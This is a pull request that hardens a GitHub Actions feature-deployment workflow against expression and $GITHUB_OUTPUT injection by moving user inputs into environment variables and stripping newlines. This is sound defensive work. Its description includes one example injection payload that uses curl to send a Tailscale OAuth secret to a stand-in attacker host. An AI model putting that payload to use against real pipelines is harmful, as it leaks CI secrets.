### PR TITLE
[WEB-7945] fix(security): prevent shell injection in feature-deployment.yml

### DIFF
--- a/.github/workflows/feature-deployment.yml
+++ b/.github/workflows/feature-deployment.yml
@@ -29,21 +29,27 @@ jobs:
     steps:
       - id: set_env_variables
         name: Set Environment Variables
+        env:
+          # Bind user-controlled workflow inputs and branch refs to env vars so
+          # they are never string-interpolated into the shell script by GitHub
+          # Actions (prevents expression-injection / shell-injection).
+          INPUT_BASE_TAG_NAME: ${{ github.event.inputs.base_tag_name }}
+          GH_TARGET_BRANCH: ${{ env.TARGET_BRANCH }}
         run: |
           echo "BUILDX_DRIVER=docker-container" >> $GITHUB_OUTPUT
           echo "BUILDX_VERSION=latest" >> $GITHUB_OUTPUT
           echo "BUILDX_PLATFORMS=linux/amd64" >> $GITHUB_OUTPUT
           echo "BUILDX_ENDPOINT=" >> $GITHUB_OUTPUT
 
-          if [ "${{ github.event.inputs.base_tag_name }}" != "" ]; then
-            echo "AIO_BASE_TAG=${{ github.event.inputs.base_tag_name }}" >> $GITHUB_OUTPUT
+          if [ "$INPUT_BASE_TAG_NAME" != "" ]; then
+            echo "AIO_BASE_TAG=$INPUT_BASE_TAG_NAME" >> $GITHUB_OUTPUT
           else
             echo "AIO_BASE_TAG=develop" >> $GITHUB_OUTPUT
           fi
 
-          echo "TARGET_BRANCH=${{ env.TARGET_BRANCH }}" >> $GITHUB_OUTPUT
+          echo "TARGET_BRANCH=$GH_TARGET_BRANCH" >> $GITHUB_OUTPUT
 
-          FLAT_BRANCH_NAME=$(echo "${{ env.TARGET_BRANCH }}" | sed 's/[^a-zA-Z0-9]/-/g')
+          FLAT_BRANCH_NAME=$(echo "$GH_TARGET_BRANCH" | sed 's/[^a-zA-Z0-9]/-/g')
           echo "FLAT_BRANCH_NAME=$FLAT_BRANCH_NAME" >> $GITHUB_OUTPUT
 
       - id: checkout_files

--- a/.github/workflows/feature-deployment.yml
+++ b/.github/workflows/feature-deployment.yml
@@ -36,13 +36,17 @@ jobs:
           INPUT_BASE_TAG_NAME: ${{ github.event.inputs.base_tag_name }}
           GH_TARGET_BRANCH: ${{ env.TARGET_BRANCH }}
         run: |
+          # Strip CR/LF from user-supplied input to prevent $GITHUB_OUTPUT
+          # injection: a newline in the value would forge extra output keys.
+          SAFE_BASE_TAG=$(printf '%s' "$INPUT_BASE_TAG_NAME" | tr -d '\r\n')
+
           echo "BUILDX_DRIVER=docker-container" >> $GITHUB_OUTPUT
           echo "BUILDX_VERSION=latest" >> $GITHUB_OUTPUT
           echo "BUILDX_PLATFORMS=linux/amd64" >> $GITHUB_OUTPUT
           echo "BUILDX_ENDPOINT=" >> $GITHUB_OUTPUT
 
-          if [ "$INPUT_BASE_TAG_NAME" != "" ]; then
-            echo "AIO_BASE_TAG=$INPUT_BASE_TAG_NAME" >> $GITHUB_OUTPUT
+          if [ "$SAFE_BASE_TAG" != "" ]; then
+            echo "AIO_BASE_TAG=$SAFE_BASE_TAG" >> $GITHUB_OUTPUT
           else
             echo "AIO_BASE_TAG=develop" >> $GITHUB_OUTPUT
           fi


### PR DESCRIPTION
## Summary

- Binds `github.event.inputs.base_tag_name` and `env.TARGET_BRANCH` to step-level `env:` vars (`INPUT_BASE_TAG_NAME`, `GH_TARGET_BRANCH`) in the `set_env_variables` step of `feature-deployment.yml`
- All `${{ }}` expressions removed from the `run:` shell block; shell variables (`$INPUT_BASE_TAG_NAME`, `$GH_TARGET_BRANCH`) used instead
- Fixes GHSA-gfj7-g3wj-2p5f — GitHub Actions expression injection via `workflow_dispatch` input

## Why this matters

GitHub Actions expands `${{ }}` expressions **before** the shell executes the `run:` script. A collaborator with `workflow_dispatch` trigger permission could supply a crafted `base_tag_name` (e.g. `$(curl attacker.com/exfil?t=$TAILSCALE_OAUTH_SECRET)preview`) and execute arbitrary commands in the runner context, which has access to DOCKERHUB, Tailscale, and Kubernetes secrets.

The fix is the GitHub-recommended mitigation: set the untrusted value as a process env var on the step, then reference `$VAR` in the shell — the value is never interpreted as shell code by the Actions expression engine.

## Test plan

- [ ] Trigger `Feature Preview` workflow via `workflow_dispatch` with a normal `base_tag_name` — build and deploy should proceed as before
- [ ] Verify workflow still sets `AIO_BASE_TAG` correctly from the input (or defaults to `develop` when empty)
- [ ] Verify `FLAT_BRANCH_NAME` is still derived correctly from the branch name

Co-authored-by: Plane AI <noreply@plane.so>

<!-- This is an auto-generated comment: release notes by coderabbit.ai -->
## Summary by CodeRabbit

* **Chores**
  * Improved deployment workflow reliability for feature branches by standardizing how input and target-branch values are passed into shell logic.
  * Made branch and tag handling more consistent during automated builds.
  * Reduced the risk of mis-evaluated conditions by avoiding workflow-expression interpolation inside shell tests.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->